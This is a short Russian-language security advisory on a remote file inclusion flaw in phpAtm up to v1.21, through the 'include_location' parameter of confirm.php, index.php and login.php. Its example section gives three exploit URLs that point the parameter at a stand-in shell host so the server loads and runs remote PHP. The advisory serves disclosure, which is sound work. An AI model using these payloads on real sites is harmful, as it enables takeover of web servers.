Программа: phpAtm <= v1.21

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "include_location" в сценариях confirm.php, index.php и login.php. Удаленный пользователь может с помощью специально сформированного запроса выполнит произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.sitename.com/[script_path]/confirm.php?include_location =http://shellurl.com ?  
http://www.sitename.com/[script_path]/index.php?include_location =http://shellurl.com ?   
http://www.sitename.com/[script_path]/login.php?include_location =http://shellurl.com ?



Оставить мнение